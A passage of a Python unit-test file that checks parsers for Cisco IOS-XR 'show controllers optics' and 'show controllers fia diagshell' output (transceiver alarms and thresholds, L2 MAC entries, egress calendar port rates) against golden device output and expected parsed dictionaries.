"detected_los_lol_fault": [
"RX-LOS"
]
},
"laser_bias_current": "0.0 mA",
"actual_tx_power": "-17.25 dBm",
"rx_power": "-40.00 dBm",
"performance_monitoring": "Enable",
"threshold_values": {
"Rx Power Threshold(dBm)": {
"parameter": "Rx Power Threshold(dBm)",
"high_alarm": "2.0",
"low_alarm": "-13.9",
"high_warning": "-1.0",
"low_warning": "-9.9"
},
"Tx Power Threshold(dBm)": {
"parameter": "Tx Power Threshold(dBm)",
"high_alarm": "1.6",
"low_alarm": "-11.3",
"high_warning": "-1.3",
"low_warning": "-7.3"
},
"LBC Threshold(mA)": {
"parameter": "LBC Threshold(mA)",
"high_alarm": "11.00",
"low_alarm": "4.00",
"high_warning": "10.00",
"low_warning": "5.00"
},
"Temp. Threshold(celsius)": {
"parameter": "Temp. Threshold(celsius)",
"high_alarm": "75.00",
"low_alarm": "-5.00",
"high_warning": "70.00",
"low_warning": "0.00"
},
"Voltage Threshold(volt)": {
"parameter": "Voltage Threshold(volt)",
"high_alarm": "3.63",
"low_alarm": "2.97",
"high_warning": "3.46",
"low_warning": "3.13"
}
},
"polarization_parameters": "not supported by optics",
"temperature": "31.00 Celsius",
"voltage": "3.30 V"
},
"transceiver_vendor_details": {
"form_factor": "SFP+",
"optics_type": "SFP+ 10G SR",
"name": "CISCO-FINISAR",
"oui_number": "00.90.65",
"part_number": "FTLX8571D3BCL-C2",
"rev_number": "A",
"serial_number": "FNS210108H7",
"pid": "SFP-10G-SR",
"vid": "V03",
"date_code": "17/01/03"
}
}
}
golden_output4 = {'execute.return_value': '''
#show controllers optics 0/0/0/18
Sat Aug 3 03:19:06.519 EST
Controller State: Up
Transport Admin State: In Service
Laser State: Off
LED State: Off
Optics Status
Optics Type: SFP+ 10G SR
Wavelength = 850.00 nm
Alarm Status:
-------------
Detected Alarms:
LOW-RX1-PWR
LOW-TX1-PWR
LOW-TX1_LBC
LOS/LOL/Fault Status:
Detected LOS/LOL/FAULT: RX-LOS
Laser Bias Current = 0.0 mA
Actual TX Power = -17.25 dBm
RX Power = -40.00 dBm
Performance Monitoring: Enable
THRESHOLD VALUES
----------------
Parameter High Alarm Low Alarm High Warning Low Warning
------------------------ ---------- --------- ------------ -----------
Rx Power Threshold(dBm) 2.0 -13.9 -1.0 -9.9
Tx Power Threshold(dBm) 1.6 -11.3 -1.3 -7.3
LBC Threshold(mA) 11.00 4.00 10.00 5.00
Temp. Threshold(celsius) 75.00 -5.00 70.00 0.00
Voltage Threshold(volt) 3.63 2.97 3.46 3.13
Polarization parameters not supported by optics
Temperature = 31.00 Celsius
Voltage = 3.30 V
Transceiver Vendor Details
Form Factor : SFP+
Optics type : SFP+ 10G SR
Name : CISCO-FINISAR
OUI Number : 00.90.65
Part Number : FTLX8571D3BCL-C2
Rev Number : A
Serial Number : FNS210108H7
PID : SFP-10G-SR
VID : V03
Date Code(yy/mm/dd) : 17/01/03
'''}
def test_empty(self):
self.device = Mock(**self.empty_output)
obj = ShowControllersOptics(device=self.device)
with self.assertRaises(SchemaEmptyParserError):
parsed_output = obj.parse(port='0/0/0/0')
def test_golden1(self):
self.device = Mock(**self.golden_output1)
obj = ShowControllersOptics(device=self.device)
parsed_output = obj.parse(port='0/0/0/0')
self.assertEqual(parsed_output, self.golden_parsed_output1)
def test_golden2(self):
self.device = Mock(**self.golden_output2)
obj = ShowControllersOptics(device=self.device)
parsed_output = obj.parse(port='0/0/1/2')
self.assertEqual(parsed_output, self.golden_parsed_output2)
def test_golden3(self):
self.device = Mock(**self.golden_output3)
obj = ShowControllersOptics(device=self.device)
parsed_output = obj.parse(port='0/0/0/20')
self.assertEqual(parsed_output, self.golden_parsed_output3)
def test_golden4(self):
self.device = Mock(**self.golden_output4)
obj = ShowControllersOptics(device=self.device)
parsed_output = obj.parse(port='0/0/0/18')
self.assertEqual(parsed_output, self.golden_parsed_output4)
# ==============================================================================================
# Unit test for 'show controllers fia diagshell {diagshell_unit} "l2 show" location {location}'
# ==============================================================================================
class test_show_controllers_fia_diagshell_location(unittest.TestCase):
'''Unit test for:
* 'show controllers fia diagshell {diagshell_unit} "l2 show" location {location}'
'''
maxDiff = None
empty_output = {'execute.return_value': ''}
golden_parsed_output1 = {
'nodes':
{'0/0/CPU0':
{'vlan':
{4:
{'mac':
{'00:00:03:ff:01:0c':
{'encap_id': '0x301d',
'gport': '0xc000001',
'trunk': 1}}},
2522:
{'mac':
{'fc:00:00:ff:01:03':
{'encap_id': '0xffffffff',
'gport': '0x9800401d',
'static': True}}},
2524:
{'mac':
{'fc:00:00:ff:01:0c':
{'encap_id': '0x3001',
'gport': '0xc000000',
'static': True,
'trunk': 0}}},
2544:
{'mac':
{'fc:00:00:ff:01:8c':
{'encap_id': '0x2007',
'gport': '0x8000048'},
'fc:00:00:ff:01:9c':
{'encap_id': '0x2007',
'gport': '0x8000048',
'trunk': 0}}}}}}}
golden_output1 = {'execute.return_value': '''
RP/0/RP0/CPU0:UUT4#show controller fia diagshell 0 'l2 show' location all
Node ID: 0/0/CPU0
mac=fc:00:00:ff:01:8c vlan=2544 GPORT=0x8000048 encap_id=0x2007
mac=fc:00:00:ff:01:03 vlan=2522 GPORT=0x9800401d Static encap_id=0xffffffff
mac=fc:00:00:ff:01:9c vlan=2544 GPORT=0x8000048 Trunk=0 encap_id=0x2007
mac=fc:00:00:ff:01:0c vlan=2524 GPORT=0xc000000 Trunk=0 Static encap_id=0x3001
mac=00:00:03:ff:01:0c vlan=4 GPORT=0xc000001 Trunk=1 encap_id=0x301d
'''}
def test_empty(self):
self.device = Mock(**self.empty_output)
obj = ShowControllersFiaDiagshellL2showLocation(device=self.device)
with self.assertRaises(SchemaEmptyParserError):
parsed_output = obj.parse()
def test_golden1(self):
self.device = Mock(**self.golden_output1)
obj = ShowControllersFiaDiagshellL2showLocation(device=self.device)
parsed_output = obj.parse()
self.assertEqual(parsed_output, self.golden_parsed_output1)
# ==============================================================================================
# Unit test for 'show controllers fia diagshell 0 "diag egr_calendars" location all'
# ==============================================================================================
class TestShowControllersFiaDiagshellDiagEgrCalendarsLocation(unittest.TestCase):
'''Unit test for:
* 'show controllers fia diagshell 0 "diag egr_calendars" location all'
'''
maxDiff = None
empty_output = {'execute.return_value': ''}
golden_parsed_output1 = {
'node_id': {
'0/0/CPU0': {
'port': {
0: {
'e2e_if': 4,
'e2e_if_rate': 1050000,
'e2e_port_rate': 350000,
'egq_if': 28,
'egq_if_rate': 990000,
'egq_port_rate': 336671,
'high_calendar': 255,
'low_calendar': 4,
'priority': 'LOW',
},
1: {
'e2e_if': 36,
'e2e_if_rate': 105004160,
'e2e_port_rate': 105004160,
'egq_if': 1,
'egq_if_rate': 609052500,
'egq_port_rate': 101000014,
'high_calendar': 32,
'low_calendar': 32,
'priority': 'LOW',
},
5: {
'e2e_if': 37,
'e2e_if_rate': 105004160,
'e2e_port_rate': 105004160,
'egq_if': 2,
'egq_if_rate': 609052500,
'egq_port_rate': 101000014,
'high_calendar': 32,
'low_calendar': 32,
'priority': 'LOW',
},
9: {
'e2e_if': 38,
'e2e_if_rate': 105004160,
'e2e_port_rate': 105004160,
'egq_if': 3,
'egq_if_rate': 609052500,
'egq_port_rate': 101000014,
'high_calendar': 32,
'low_calendar': 32,
'priority': 'LOW',
},
13: {
'e2e_if': 35,
'e2e_if_rate': 105004160,
'e2e_port_rate': 105004160,
'egq_if': 0,
'egq_if_rate': 609052500,
'egq_port_rate': 101000014,
'high_calendar': 32,
'low_calendar': 32,
'priority': 'LOW',
},
17: {
'e2e_if': 39,
'e2e_if_rate': 105004160,
'e2e_port_rate': 105004160,
'egq_if': 4,
'egq_if_rate': 609052500,
'egq_port_rate': 101000014,
'high_calendar': 32,
'low_calendar': 32,
'priority': 'LOW',
},
21: {
'e2e_if': 40,
'e2e_if_rate': 105004160,
'e2e_port_rate': 105004160,
'egq_if': 5,
'egq_if_rate': 609052500,
'egq_port_rate': 101000014,
'high_calendar': 32,
'low_calendar': 32,
'priority': 'LOW',
},
25: {
'e2e_if': 50,
'e2e_if_rate': 10500096,
'e2e_port_rate': 10500096,
'egq_if': 48,
'egq_if_rate': 433417500,
'egq_port_rate': 10100011,
'high_calendar': 32,
'low_calendar': 32,
'priority': 'LOW',
},
26: {
'e2e_if': 38,
'e2e_if_rate': 1050112,
'e2e_port_rate': 1050112,
'egq_if': 36,
'egq_if_rate': 433417500,
'egq_port_rate': 1010003,
'high_calendar': 32,
'low_calendar': 32,
'priority': 'LOW',
},
27: {
'e2e_if': 36,
'e2e_if_rate': 1050112,
'e2e_port_rate': 1050112,
'egq_if': 34,
'egq_if_rate': 433417500,
'egq_port_rate': 1010003,
'high_calendar': 32,
'low_calendar': 32,
'priority': 'LOW',
},
28: {
'e2e_if': 51,
'e2e_if_rate': 10500096,
'e2e_port_rate': 10500096,
'egq_if': 49,
'egq_if_rate': 433417500,
'egq_port_rate': 10100011,
'high_calendar': 32,
'low_calendar': 32,
'priority': 'LOW',
},
29: {
'e2e_if': 37,
'e2e_if_rate': 1050112,
'e2e_port_rate': 1050112,
'egq_if': 35,
'egq_if_rate': 433417500,
'egq_port_rate': 1010003,
'high_calendar': 32,
'low_calendar': 32,
'priority': 'LOW',
},
30: {
'e2e_if': 78,
'e2e_if_rate': 10500096,
'e2e_port_rate': 10500096,
'egq_if': 76,
'egq_if_rate': 433417500,
'egq_port_rate': 10100011,
'high_calendar': 32,
'low_calendar': 32,
'priority': 'LOW',
},
31: {
'e2e_if': 41,
'e2e_if_rate': 10500096,
'e2e_port_rate': 10500096,
'egq_if': 39,
'egq_if_rate': 433417500,
'egq_port_rate': 10100011,
'high_calendar': 32,
'low_calendar': 32,
'priority': 'LOW',
},
32: {
'e2e_if': 80,
'e2e_if_rate': 10500096,
'e2e_port_rate': 10500096,
'egq_if': 78,
'egq_if_rate': 433417500,
'egq_port_rate': 10100011,
'high_calendar': 32,
'low_calendar': 32,
'priority': 'LOW',
},
33: {
'e2e_if': 35,
'e2e_if_rate': 1050112,
'e2e_port_rate': 1050112,
'egq_if': 33,
'egq_if_rate': 433417500,
'egq_port_rate': 1010003,
'high_calendar': 32,
'low_calendar': 32,
'priority': 'LOW',
},
34: {
'e2e_if': 40,
'e2e_if_rate': 1050112,
'e2e_port_rate': 1050112,
'egq_if': 38,
'egq_if_rate': 433417500,
'egq_port_rate': 1010003,
'high_calendar': 32,
'low_calendar': 32,
'priority': 'LOW',
},
35: {
'e2e_if': 39,
'e2e_if_rate': 1050112,
'e2e_port_rate': 1050112,
'egq_if': 37,
'egq_if_rate': 433417500,
'egq_port_rate': 1010003,
'high_calendar': 32,
'low_calendar': 32,
'priority': 'LOW',
},
36: {
'e2e_if': 49,
'e2e_if_rate': 10500096,
'e2e_port_rate': 10500096,
'egq_if': 47,
'egq_if_rate': 433417500,
'egq_port_rate': 10100011,
'high_calendar': 32,
'low_calendar': 32,
'priority': 'LOW',
},
37: {
'e2e_if': 53,
'e2e_if_rate': 10500096,
'e2e_port_rate': 10500096,
'egq_if': 51,
'egq_if_rate': 433417500,
'egq_port_rate': 10100011,
'high_calendar': 32,
'low_calendar': 32,
'priority': 'LOW',
},
38: {
'e2e_if': 42,
'e2e_if_rate': 10500096,
'e2e_port_rate': 10500096,
'egq_if': 40,
'egq_if_rate': 433417500,
'egq_port_rate': 10100011,
'high_calendar': 32,
'low_calendar': 32,
'priority': 'LOW',
},
39: {
'e2e_if': 81,
'e2e_if_rate': 10500096,
'e2e_port_rate': 10500096,
'egq_if': 79,
'egq_if_rate': 433417500,
'egq_port_rate': 10100011,
'high_calendar': 32,
'low_calendar': 32,
'priority': 'LOW',
},
40: {
'e2e_if': 79,
'e2e_if_rate': 10500096,
'e2e_port_rate': 10500096,
'egq_if': 77,
'egq_if_rate': 433417500,
'egq_port_rate': 10100011,
'high_calendar': 32,
'low_calendar': 32,
'priority': 'LOW',
},
41: {
'e2e_if': 43,
'e2e_if_rate': 10500096,
'e2e_port_rate': 10500096,
'egq_if': 41,
'egq_if_rate': 433417500,
'egq_port_rate': 10100011,
'high_calendar': 32,
'low_calendar': 32,
'priority': 'LOW',
},
42: {
'e2e_if': 52,
'e2e_if_rate': 10500096,
'e2e_port_rate': 10500096,
'egq_if': 50,
'egq_if_rate': 433417500,
'egq_port_rate': 10100011,
'high_calendar': 32,
'low_calendar': 32,
'priority': 'LOW',
},
43: {
'e2e_if': 44,
'e2e_if_rate': 10500096,
'e2e_port_rate': 10500096,
'egq_if': 42,
'egq_if_rate': 433417500,
'egq_port_rate': 10100011,
'high_calendar': 32,
'low_calendar': 32,
'priority': 'LOW',
},
44: {
'e2e_if': 82,
'e2e_if_rate': 10500096,
'e2e_port_rate': 10500096,
'egq_if': 80,
'egq_if_rate': 433417500,
'egq_port_rate': 10100011,
'high_calendar': 32,
'low_calendar': 32,
'priority': 'LOW',
},
45: {
'e2e_if': 45,
'e2e_if_rate': 10500096,
'e2e_port_rate': 10500096,
'egq_if': 43,
'egq_if_rate': 433417500,
'egq_port_rate': 10100011,
'high_calendar': 32,
'low_calendar': 32,
'priority': 'LOW',
},
46: {
'e2e_if': 46,
'e2e_if_rate': 10500096,
'e2e_port_rate': 10500096,
'egq_if': 44,
'egq_if_rate': 433417500,
'egq_port_rate': 10100011,
'high_calendar': 32,
'low_calendar': 32,
'priority': 'LOW',
},
47: {
'e2e_if': 47,
'e2e_if_rate': 10500096,
'e2e_port_rate': 10500096,
'egq_if': 45,
'egq_if_rate': 433417500,
'egq_port_rate': 10100011,
'high_calendar': 32,
'low_calendar': 32,
'priority': 'LOW',
},
48: {
'e2e_if': 48,
'e2e_if_rate': 10500096,
'e2e_port_rate': 10500096,
'egq_if': 46,
'egq_if_rate': 433417500,
'egq_port_rate': 10100011,
'high_calendar': 32,
'low_calendar': 32,
'priority': 'LOW',
},
49: {
'e2e_if': 55,
'e2e_if_rate': 10500096,
'e2e_port_rate': 10500096,
'egq_if': 53,
'egq_if_rate': 433417500,
'egq_port_rate': 10100011,
'high_calendar': 32,
'low_calendar': 32,
'priority': 'LOW',
},
50: {
'e2e_if': 75,
'e2e_if_rate': 10500096,
'e2e_port_rate': 10500096,
'egq_if': 73,
'egq_if_rate': 433417500,
'egq_port_rate': 10100011,
'high_calendar': 32,
'low_calendar': 32,
'priority': 'LOW',
},
51: {
'e2e_if': 73,
'e2e_if_rate': 10500096,
'e2e_port_rate': 10500096,
'egq_if': 71,
'egq_if_rate': 433417500,
'egq_port_rate': 10100011,
'high_calendar': 32,
'low_calendar': 32,
'priority': 'LOW',
},
52: {
'e2e_if': 72,
'e2e_if_rate': 10500096,
'e2e_port_rate': 10500096,
'egq_if': 70,
'egq_if_rate': 433417500,
'egq_port_rate': 10100011,
'high_calendar': 32,
'low_calendar': 32,
'priority': 'LOW',
},
53: {
'e2e_if': 71,
'e2e_if_rate': 10500096,
'e2e_port_rate': 10500096,
'egq_if': 69,
'egq_if_rate': 433417500,
'egq_port_rate': 10100011,
'high_calendar': 32,
'low_calendar': 32,
'priority': 'LOW',
},
54: {
'e2e_if': 69,
'e2e_if_rate': 10500096,
'e2e_port_rate': 10500096,
'egq_if': 67,
'egq_if_rate': 433417500,
'egq_port_rate': 10100011,
'high_calendar': 32,
'low_calendar': 32,
'priority': 'LOW',
},
55: {
'e2e_if': 70,
'e2e_if_rate': 10500096,
'e2e_port_rate': 10500096,
'egq_if': 68,
'egq_if_rate': 433417500,
'egq_port_rate': 10100011,
'high_calendar': 32,
'low_calendar': 32,
'priority': 'LOW',
},
56: {
'e2e_if': 68,
'e2e_if_rate': 10500096,
'e2e_port_rate': 10500096,
'egq_if': 66,
'egq_if_rate': 433417500,
'egq_port_rate': 10100011,
'high_calendar': 32,
'low_calendar': 32,
'priority': 'LOW',
},
57: {
'e2e_if': 76,
'e2e_if_rate': 10500096,
'e2e_port_rate': 10500096,
'egq_if': 74,
'egq_if_rate': 433417500,
'egq_port_rate': 10100011,
'high_calendar': 32,
'low_calendar': 32,
'priority': 'LOW',
},
58: {
'e2e_if': 56,
'e2e_if_rate': 10500096,
'e2e_port_rate': 10500096,
'egq_if': 54,
'egq_if_rate': 433417500,
'egq_port_rate': 10100011,
'high_calendar': 32,
'low_calendar': 32,
'priority': 'LOW',
},
59: {
'e2e_if': 74,
'e2e_if_rate': 10500096,
'e2e_port_rate': 10500096,
'egq_if': 72,
'egq_if_rate': 433417500,
'egq_port_rate': 10100011,
'high_calendar': 32,
'low_calendar': 32,
'priority': 'LOW',
},
60: {
'e2e_if': 77,
'e2e_if_rate': 10500096,
'e2e_port_rate': 10500096,
'egq_if': 75,
'egq_if_rate': 433417500,
'egq_port_rate': 10100011,
'high_calendar': 32,
'low_calendar': 32,
'priority': 'LOW',
},
61: {
'e2e_if': 54,
'e2e_if_rate': 10500096,
'e2e_port_rate': 10500096,
'egq_if': 52,
'egq_if_rate': 433417500,
'egq_port_rate': 10100011,
'high_calendar': 32,
'low_calendar': 32,
'priority': 'LOW',
},
62: {
'e2e_if': 64,
'e2e_if_rate': 10500096,
'e2e_port_rate': 10500096,
'egq_if': 62,
'egq_if_rate': 433417500,
'egq_port_rate': 10100011,
'high_calendar': 32,
'low_calendar': 32,
'priority': 'LOW',
},
63: {
'e2e_if': 66,
'e2e_if_rate': 10500096,
'e2e_port_rate': 10500096,
'egq_if': 64,
'egq_if_rate': 433417500,
'egq_port_rate': 10100011,
'high_calendar': 32,
'low_calendar': 32,
'priority': 'LOW',
},
64: {
'e2e_if': 67,
'e2e_if_rate': 10500096,
'e2e_port_rate': 10500096,
'egq_if': 65,
'egq_if_rate': 433417500,
'egq_port_rate': 10100011,
'high_calendar': 32,
'low_calendar': 32,
'priority': 'LOW',
},
65: {
'e2e_if': 62,
'e2e_if_rate': 10500096,
'e2e_port_rate': 10500096,
'egq_if': 60,
'egq_if_rate': 433417500,
'egq_port_rate': 10100011,
'high_calendar': 32,
'low_calendar': 32,
'priority': 'LOW',
},
66: {
'e2e_if': 61,
'e2e_if_rate': 10500096,
'e2e_port_rate': 10500096,
'egq_if': 59,
'egq_if_rate': 433417500,
'egq_port_rate': 10100011,
'high_calendar': 32,
'low_calendar': 32,
'priority': 'LOW',
},
67: {
'e2e_if': 63,
'e2e_if_rate': 10500096,
'e2e_port_rate': 10500096,
'egq_if': 61,
'egq_if_rate': 433417500,
'egq_port_rate': 10100011,
'high_calendar': 32,
'low_calendar': 32,
'priority': 'LOW',
},
68: {
'e2e_if': 65,
'e2e_if_rate': 10500096,
'e2e_port_rate': 10500096,
'egq_if': 63,
'egq_if_rate': 433417500,
'egq_port_rate': 10100011,
'high_calendar': 32,
'low_calendar': 32,
'priority': 'LOW',
},
69: {
'e2e_if': 57,
'e2e_if_rate': 10500096,
'e2e_port_rate': 10500096,
'egq_if': 55,
'egq_if_rate': 433417500,
'egq_port_rate': 10100011,
'high_calendar': 32,
'low_calendar': 32,
'priority': 'LOW',
},
70: {
'e2e_if': 60,
'e2e_if_rate': 10500096,
'e2e_port_rate': 10500096,
'egq_if': 58,
'egq_if_rate': 433417500,
'egq_port_rate': 10100011,
'high_calendar': 32,
'low_calendar': 32,
'priority': 'LOW',
},
71: {
'e2e_if': 59,
'e2e_if_rate': 10500096,
'e2e_port_rate': 10500096,
'egq_if': 57,
'egq_if_rate': 433417500,
'egq_port_rate': 10100011,
'high_calendar': 32,
'low_calendar': 32,
'priority': 'LOW',
},
72: {
'e2e_if': 58,
'e2e_if_rate': 10500096,
'e2e_port_rate': 10500096,
'egq_if': 56,
'egq_if_rate': 433417500,
'egq_port_rate': 10100011,
'high_calendar': 32,
'low_calendar': 32,
'priority': 'LOW',
},
128: {
'e2e_if': 5,
'e2e_if_rate': 161280000,
'e2e_port_rate': 5184078,
'egq_if': 31,
'egq_if_rate': 159997500,
'egq_port_rate': 1010113,
'high_calendar': 255,
'low_calendar': 5,
'priority': 'LOW',
},
129: {
'e2e_if': 4,
'e2e_if_rate': 339536840,
'e2e_port_rate': 5180956,
'egq_if': 31,
'egq_if_rate': 323190000,
'egq_port_rate': 1010033,
'high_calendar': 255,
'low_calendar': 4,
'priority': 'LOW',
},
130: {
'e2e_if': 5,
'e2e_if_rate': 161280000,
'e2e_port_rate': 5184078,
'egq_if': 31,
'egq_if_rate': 159997500,
'egq_port_rate': 1010113,
'high_calendar': 255,
'low_calendar': 5,
'priority': 'LOW',
},
131: {
'e2e_if': 4,
'e2e_if_rate': 339536840,
'e2e_port_rate': 5180956,
'egq_if': 31,
'egq_if_rate': 323190000,
'egq_port_rate': 1010033,
'high_calendar': 255,
'low_calendar': 4,
'priority': 'LOW',
},
132: {
'e2e_if': 5,
'e2e_if_rate': 161280000,
'e2e_port_rate': 165890478,
'egq_if': 31,
'egq_if_rate': 159997500,
'egq_port_rate': 161600009,
'high_calendar': 255,
'low_calendar': 5,
'priority': 'LOW',
},
133: {
'e2e_if': 4,
'e2e_if_rate': 339536840,
'e2e_port_rate': 165790561,
'egq_if': 31,
'egq_if_rate': 323190000,
'egq_port_rate': 161600021,
'high_calendar': 255,
'low_calendar': 4,
'priority': 'LOW',
},
134: {
'e2e_if': 5,
'e2e_if_rate': 161280000,
'e2e_port_rate': 5184078,
'egq_if': 31,
'egq_if_rate': 159997500,
'egq_port_rate': 1010113,
'high_calendar': 255,
'low_calendar': 5,
'priority': 'LOW',
},
135: {
'e2e_if': 4,
'e2e_if_rate': 339536840,
'e2e_port_rate': 5180956,
'egq_if': 31,
'egq_if_rate': 323190000,
'egq_port_rate': 1010033,
'high_calendar': 255,
'low_calendar': 4,
'priority': 'LOW',
},
136: {
'e2e_if': 5,
'e2e_if_rate': 161280000,
'e2e_port_rate': 165890478,
'egq_if': 31,
'egq_if_rate': 159997500,
'egq_port_rate': 161600009,
'high_calendar': 255,
'low_calendar': 5,
'priority': 'LOW',
},
137: {
'e2e_if': 4,
'e2e_if_rate': 339536840,
'e2e_port_rate': 165790561,
'egq_if': 31,
'egq_if_rate': 323190000,
'egq_port_rate': 161600021,
'high_calendar': 255,
'low_calendar': 4,
'priority': 'LOW',
},
138: {
'e2e_if': 5,
'e2e_if_rate': 161280000,
'e2e_port_rate': 165890478,
'egq_if': 31,
'egq_if_rate': 159997500,
'egq_port_rate': 161600009,
'high_calendar': 255,
'low_calendar': 5,
'priority': 'LOW',
},
139: {
'e2e_if': 4,
'e2e_if_rate': 339536840,
'e2e_port_rate': 165790561,
'egq_if': 31,
'egq_if_rate': 323190000,
'egq_port_rate': 161600021,
'high_calendar': 255,
'low_calendar': 4,
'priority': 'LOW',
},
140: {
'e2e_if': 5,
'e2e_if_rate': 161280000,
'e2e_port_rate': 5184078,
'egq_if': 31,
'egq_if_rate': 159997500,
'egq_port_rate': 1010113,
'high_calendar': 255,
'low_calendar': 5,
'priority': 'LOW',
},
141: {
'e2e_if': 4,
'e2e_if_rate': 339536840,
'e2e_port_rate': 5180956,
'egq_if': 31,
'egq_if_rate': 323190000,
'egq_port_rate': 1010033,
'high_calendar': 255,
'low_calendar': 4,
'priority': 'LOW',
},
142: {
'e2e_if': 5,
'e2e_if_rate': 161280000,
'e2e_port_rate': 165890478,
'egq_if': 31,
'egq_if_rate': 159997500,
'egq_port_rate': 161600009,
'high_calendar': 255,
'low_calendar': 5,
'priority': 'LOW',
},
143: {
'e2e_if': 4,
'e2e_if_rate': 339536840,
'e2e_port_rate': 165790561,
'egq_if': 31,
'egq_if_rate': 323190000,
'egq_port_rate': 161600021,
'high_calendar': 255,
'low_calendar': 4,
'priority': 'LOW',
},
144: {
'e2e_if': 5,
'e2e_if_rate': 161280000,
'e2e_port_rate': 165890478,
'egq_if': 31,
'egq_if_rate': 159997500,
'egq_port_rate': 161600009,
'high_calendar': 255,
'low_calendar': 5,
'priority': 'LOW',
},
145: {
'e2e_if': 4,
'e2e_if_rate': 339536840,
'e2e_port_rate': 165790561,
'egq_if': 31,
'egq_if_rate': 323190000,
'egq_port_rate': 161600021,
'high_calendar': 255,
'low_calendar': 4,
'priority': 'LOW',
},
146: {
'e2e_if': 5,
'e2e_if_rate': 161280000,
'e2e_port_rate': 165890478,
'egq_if': 31,
'egq_if_rate': 159997500,
'egq_port_rate': 161600009,
'high_calendar': 255,
'low_calendar': 5,
'priority': 'LOW',
},
147: {
'e2e_if': 4,
'e2e_if_rate': 339536840,
'e2e_port_rate': 165790561,
'egq_if': 31,
'egq_if_rate': 323190000,
'egq_port_rate': 161600021,
'high_calendar': 255,
'low_calendar': 4,
'priority': 'LOW',
},
148: {
'e2e_if': 5,
'e2e_if_rate': 161280000,
'e2e_port_rate': 10368155,
'egq_if': 31,
'egq_if_rate': 159997500,
'egq_port_rate': 10100009,
'high_calendar': 255,
'low_calendar': 5,
'priority': 'LOW',
},
149: {
'e2e_if': 4,
'e2e_if_rate': 339536840,
'e2e_port_rate': 10361911,
'egq_if': 31,
'egq_if_rate': 323190000,
'egq_port_rate': 10100089,
'high_calendar': 255,
'low_calendar': 4,
'priority': 'LOW',
},
208: {
'e2e_if': 4,
'e2e_if_rate': 1050000,
'e2e_port_rate': 10500000,
'egq_if': 28,
'egq_if_rate': 990000,
'egq_port_rate': 10100000,
'high_calendar': 255,
'low_calendar': 4,
'priority': 'LOW',
},
232: {
'e2e_if': 32,
'e2e_if_rate': 31500416,
'e2e_port_rate': 31500416,
'egq_if': 30,
'egq_if_rate': 433417500,
'egq_port_rate': 30300003,
'high_calendar': 32,
'low_calendar': 32,
'priority': 'LOW',
},
233: {
'e2e_if': 32,
'e2e_if_rate': 1050112,
'e2e_port_rate': 1050112,
'egq_if': 30,
'egq_if_rate': 609052500,
'egq_port_rate': 1010011,
'high_calendar': 32,
'low_calendar': 32,
'priority': 'LOW',
},
235: {
'e2e_if': 5,
'e2e_if_rate': 161280000,
'e2e_port_rate': 20736310,
'egq_if': 31,
'egq_if_rate': 159997500,
'egq_port_rate': 20200017,
'high_calendar': 255,
'low_calendar': 5,
'priority': 'LOW',
},
240: {
'e2e_if': 33,
'e2e_if_rate': 105004160,
'e2e_port_rate': 105004160,
'egq_if': 29,
'egq_if_rate': 433417500,
'egq_port_rate': 101000003,
'high_calendar': 32,
'low_calendar': 32,
'priority': 'LOW',
},
241: {
'e2e_if': 33,
'e2e_if_rate': 1050112,
'e2e_port_rate': 1050112,
'egq_if': 29,
'egq_if_rate': 609052500,
'egq_port_rate': 1010011,
'high_calendar': 32,
'low_calendar': 32,
'priority': 'LOW',
},
246: {
'e2e_if': 5,
'e2e_if_rate': 161280000,
'e2e_port_rate': 25920388,
'egq_if': 31,
'egq_if_rate': 159997500,
'egq_port_rate': 25250083,
'high_calendar': 255,
'low_calendar': 5,
'priority': 'LOW',
},
247: {
'e2e_if': 4,
'e2e_if_rate': 339536840,
'e2e_port_rate': 25904776,
'egq_if': 31,
'egq_if_rate': 323190000,
'egq_port_rate': 25250105,
'high_calendar': 255,
'low_calendar': 4,
'priority': 'LOW',
},
248: {
'e2e_if': 5,
'e2e_if_rate': 161280000,
'e2e_port_rate': 10368155,
'egq_if': 31,
'egq_if_rate': 159997500,
'egq_port_rate': 10100009,
'high_calendar': 255,
'low_calendar': 5,
'priority': 'LOW',
},
249: {
'e2e_if': 4,
'e2e_if_rate': 339536840,
'e2e_port_rate': 10361911,
'egq_if': 31,
'egq_if_rate': 323190000,
'egq_port_rate': 10100089,
'high_calendar': 255,
'low_calendar': 4,
'priority': 'LOW',
},
250: {
'e2e_if': 5,
'e2e_if_rate': 161280000,
'e2e_port_rate': 165890478,
'egq_if': 31,
'egq_if_rate': 159997500,
'egq_port_rate': 161600009,
'high_calendar': 255,
'low_calendar': 5,
'priority': 'LOW',
},
251: {
'e2e_if': 4,
'e2e_if_rate': 339536840,
'e2e_port_rate': 165790561,
'egq_if': 31,
'egq_if_rate': 323190000,
'egq_port_rate': 161600021,
'high_calendar': 255,
'low_calendar': 4,
'priority': 'LOW',
},
252: {
'e2e_if': 5,
'e2e_if_rate': 161280000,
'e2e_port_rate': 10368155,
'egq_if': 31,
'egq_if_rate': 159997500,
'egq_port_rate': 1120,
'high_calendar': 255,
'low_calendar': 5,
'priority': 'LOW',
},
253: {
'e2e_if': 4,
'e2e_if_rate': 1050000,
'e2e_port_rate': 350000,
'egq_if': 28,
'egq_if_rate': 990000,
'egq_port_rate': 101000000,
'high_calendar': 255,
'low_calendar': 4,
'priority': 'LOW',
},
},
},
},
}
golden_output1 = {'execute.return_value': '''
show controllers fia diagshell 0 "diag egr_calendars" location all
Mon Mar 23 13:12:43.297 UTC
Node ID: 0/0/CPU0
Port | Priority | High Calendar | Low Calendar | EGQ IF | E2E IF | EGQ Port Rate | EGQ IF Rate | E2E Port Rate | E2E IF Rate
----------------------------------------------------------------------------------------------------------------------------
0 | LOW | 255 | 4 | 28 | 4 | 336671 | 990000 | 350000 | 1050000
1 | LOW | 32 | 32 | 1 | 36 | 101000014 | 609052500 | 105004160 | 105004160
5 | LOW | 32 | 32 | 2 | 37 | 101000014 | 609052500 | 105004160 | 105004160
9 | LOW | 32 | 32 | 3 | 38 | 101000014 | 609052500 | 105004160 | 105004160
13 | LOW | 32 | 32 | 0 | 35 | 101000014 | 609052500 | 105004160 | 105004160
17 | LOW | 32 | 32 | 4 | 39 | 101000014 | 609052500 | 105004160 | 105004160
21 | LOW | 32 | 32 | 5 | 40 | 101000014 | 609052500 | 105004160 | 105004160
25 | LOW | 32 | 32 | 48 | 50 | 10100011 | 433417500 | 10500096 | 10500096
26 | LOW | 32 | 32 | 36 | 38 | 1010003 | 433417500 | 1050112 | 1050112
27 | LOW | 32 | 32 | 34 | 36 | 1010003 | 433417500 | 1050112 | 1050112
28 | LOW | 32 | 32 | 49 | 51 | 10100011 | 433417500 | 10500096 | 10500096
